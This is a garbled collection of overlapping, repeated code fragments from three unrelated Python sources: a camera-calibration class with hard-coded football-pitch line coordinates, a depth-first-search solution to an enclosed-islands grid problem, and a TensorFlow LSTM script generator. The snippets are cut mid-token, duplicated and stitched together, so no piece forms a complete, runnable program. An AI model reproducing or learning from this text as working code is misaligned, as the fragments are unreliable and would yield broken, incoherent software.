"= np.array([1, 141, 1]) goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2,",
"1]) penalty_area_back_left = np.array([ 1, 465, 1]) penalty_area_back_right = np.array([1592, 408, 1]) #penalty_area_front_left",
"= np.array([721, 37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline, 1]) keeper_box_back_right =",
"os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha = 13000 self.K = np.matrix([[alpha, 0.0, 800],",
", 111, 1]) goal_top_right_corner = np.array([1442, 110, 1]) goal_left_back_corner = np.array([1, 141, 1])",
"np.array([1421, 419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right",
"(goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner) goal_right_back_line = (goal_bot_right_corner,",
"= np.array([1421, 419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1])",
"419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right =",
"np.array([ 1, 465, 1]) penalty_area_back_right = np.array([1592, 408, 1]) #penalty_area_front_left = #penalty_area_front_right =",
"1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592,",
"np.array([932, 436, 1]) goal_top_left_corner = np.array([698 , 111, 1]) goal_top_right_corner = np.array([1442, 110,",
"0, backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left = np.array([",
"= (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line =",
"= (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right) goal_lines =",
"goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner)",
"= (penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar =",
"penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner)",
"goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line",
"np.array([1592, 408, 1]) #penalty_area_front_left = #penalty_area_front_right = back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar =",
"465, 1]) penalty_area_back_right = np.array([1592, 408, 1]) #penalty_area_front_left = #penalty_area_front_right = back_line =",
"110, 1]) goal_left_back_corner = np.array([1, 141, 1]) goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left",
"{\"back_line\": back_line, \"goal_top_bar\": goal_top_bar, \"goal_left_bar\" : goal_left_bar, \"goal_right_bar\": goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line}",
"= np.array([1592, 732, 1]) penalty_area_back_left = np.array([ 1, 465, 1]) penalty_area_back_right = np.array([1592,",
"goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {} self.lines = {**goal_lines, **keeper_box_lines, **penalty_box_lines}",
"<gh_stars>1-10 import os import numpy as np from interface.camera_calibration import ModelImage dir_path =",
"(keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right,",
"None self.lines = None self.lines_img_ga = None self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self):",
"#penalty_area_front_left = #penalty_area_front_right = back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar",
"#keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line",
"keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left =",
"(keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left,",
"np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left",
"def __init__(self): alpha = 13000 self.K = np.matrix([[alpha, 0.0, 800], [0.0, alpha, 400],",
"= None self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self): goal_bot_left_corner = np.array([162 , 466,",
"= {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {} self.lines = {**goal_lines, **keeper_box_lines, **penalty_box_lines} return self.lines",
"732, 1]) penalty_area_back_left = np.array([ 1, 465, 1]) penalty_area_back_right = np.array([1592, 408, 1])",
"np.array([1, 141, 1]) goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2, 0,",
"backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left = np.array([ 1,",
"= np.array([ keeper_box_width/2, 0, backline, 1]) keeper_box_back_right = np.array([1421, 419, 1]) #keeper_box_front_left =",
"goal_bot_right_corner = np.array([932, 436, 1]) goal_top_left_corner = np.array([698 , 111, 1]) goal_top_right_corner =",
"= (penalty_area_front_left, penalty_area_front_right) goal_lines = {\"back_line\": back_line, \"goal_top_bar\": goal_top_bar, \"goal_left_bar\" : goal_left_bar, \"goal_right_bar\":",
"436, 1]) goal_top_left_corner = np.array([698 , 111, 1]) goal_top_right_corner = np.array([1442, 110, 1])",
"class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha = 13000 self.K = np.matrix([[alpha, 0.0, 800], [0.0,"
] |
[
"dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and",
"0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc])",
"0 seen = set() for r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if",
"in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]] while dfs:",
"matrix) escapable = 0 seen = set() for r in range(len(matrix)): for c",
"and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) return total",
"matrix): total = sum(sum(row) for row in matrix) escapable = 0 seen =",
"in matrix) escapable = 0 seen = set() for r in range(len(matrix)): for",
"and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in",
"row in matrix) escapable = 0 seen = set() for r in range(len(matrix)):",
"[0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in seen or matrix[r][c] != 1:",
"+= 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not",
"in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc]",
"and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc))",
"for c in range(len(matrix[0])): if (r,c) in seen or matrix[r][c] != 1: continue",
"= 0 seen = set() for r in range(len(matrix)): for c in [0,len(matrix[0])-1]:",
"seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in seen",
"seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c",
"and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r",
"= dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0])",
"for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen",
"nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and",
"[0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs =",
"1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in",
"[[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] ==",
"in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for",
"!= 1: continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc = dfs.pop() escapable",
"Enclosed Islands.py class Solution: def solve(self, matrix): total = sum(sum(row) for row in",
"if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1:",
"continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc = dfs.pop() escapable += 1",
"def solve(self, matrix): total = sum(sum(row) for row in matrix) escapable = 0",
"(nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) return total -",
"range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] != 1:",
"in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs",
"in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in seen or matrix[r][c] !=",
"not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) return total - escapable",
"dfs = [[r,c]] while dfs: cr,cc = dfs.pop() escapable += 1 for nr,nc",
"set() for r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in seen",
"c in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c))",
"0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for",
"(r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]] while",
"seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc = dfs.pop() escapable += 1 for",
"(nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in",
"= set() for r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in",
"<filename>0845 Enclosed Islands.py class Solution: def solve(self, matrix): total = sum(sum(row) for row",
"= sum(sum(row) for row in matrix) escapable = 0 seen = set() for",
"for r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in seen or",
"solve(self, matrix): total = sum(sum(row) for row in matrix) escapable = 0 seen",
"= [[r,c]] while dfs: cr,cc = dfs.pop() escapable += 1 for nr,nc in",
"escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc)",
"or matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc =",
"1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c)",
"for r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in seen or",
"Solution: def solve(self, matrix): total = sum(sum(row) for row in matrix) escapable =",
"r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in seen or matrix[r][c]",
"class Solution: def solve(self, matrix): total = sum(sum(row) for row in matrix) escapable",
"c in range(len(matrix[0])): if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c))",
"cr,cc = dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and",
"for c in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] != 1: continue",
"1: continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc = dfs.pop() escapable +=",
"if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]]",
"Islands.py class Solution: def solve(self, matrix): total = sum(sum(row) for row in matrix)",
"matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc = dfs.pop()",
"seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc",
"in range(len(matrix[0])): if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs",
"sum(sum(row) for row in matrix) escapable = 0 seen = set() for r",
"0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) return",
"r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c]",
"range(len(matrix[0])): if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs =",
"not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]:",
"seen = set() for r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c)",
"matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in range(len(matrix[0])):",
"escapable = 0 seen = set() for r in range(len(matrix)): for c in",
"in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] !=",
"total = sum(sum(row) for row in matrix) escapable = 0 seen = set()",
"for row in matrix) escapable = 0 seen = set() for r in",
"dfs: cr,cc = dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix)",
"[[r,c]] while dfs: cr,cc = dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]:",
"dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in",
"== 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if",
"while dfs: cr,cc = dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if"
] |
[
"inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self, cell, rnn_size,",
"Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer",
"prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running",
"tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state",
"pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs,",
"probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate,",
"tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss",
"def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with",
"= timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i,",
"= tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return",
"summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time -",
"new text with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word",
"rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer)",
"tf import timeit import datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] =",
"save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:',",
"for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer =",
"{}, estimated to finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if",
"return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1,",
"tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess,",
"sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary,",
"self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell,",
"final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size",
"= datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss",
"', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\")",
"layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32),",
"tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def",
"final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size):",
"embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell,",
"tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm =",
"# Dynamic Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0])",
"total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far",
"get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state",
"= tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor",
"return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with",
"-1.0, 1.0), var) for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries =",
"run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver",
"else '' tv_script = tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\\n ',",
"numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class",
"{}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far =",
"num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0 or epoch_i ==",
"in ['\\n', '(', '\"'] else '' tv_script = tv_script.replace(' ' + token.lower(), key)",
"= self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences) for key,",
"gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state],",
"batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state,",
"'3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None,",
"tokens tv_script = ' '.join(gen_sentences) for key, token in token_dict.items(): ending = '",
"self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def",
"rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size,",
"+ 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0 or",
"or epoch_i == num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word,",
"'(', '\"'] else '' tv_script = tv_script.replace(' ' + token.lower(), key) tv_script =",
"tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell,",
"tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size,",
"self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size,",
"for key, token in token_dict.items(): ending = ' ' if key in ['\\n',",
"test_every == 0 or epoch_i == num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph)",
"= tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate)",
"word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state =",
"self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs()",
"(fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default():",
"generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text",
"= tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer",
"= list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every,",
"name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim),",
"num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length,",
"feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time =",
"self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost,",
".format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0",
"per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text:",
"graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in",
"= timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs",
"probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self,",
"in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches):",
"rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets,",
"grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir,",
"probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values())",
"if (epoch_i % save_every == 0 or epoch_i == num_epochs - 1): self.save_trained_model(sess,",
"self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating words probs =",
"final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab):",
"= sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed)",
"prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab)",
"train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text with prime",
"vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text with prime word: {}'.format(prime_word)) test_final_state,",
"sess, token_dict, seq_length): print('Generating new text with prime word: {}'.format(prime_word)) test_final_state, test_probs =",
"as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time =",
"train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0 or epoch_i == num_epochs",
"= self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for",
"total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0 or epoch_i == num_epochs -",
"rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected)",
"get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self,",
"fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab,",
"', '\\n') tv_script = tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor",
"import timeit import datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'",
"[(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries",
"gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in",
"initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim):",
"sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) #",
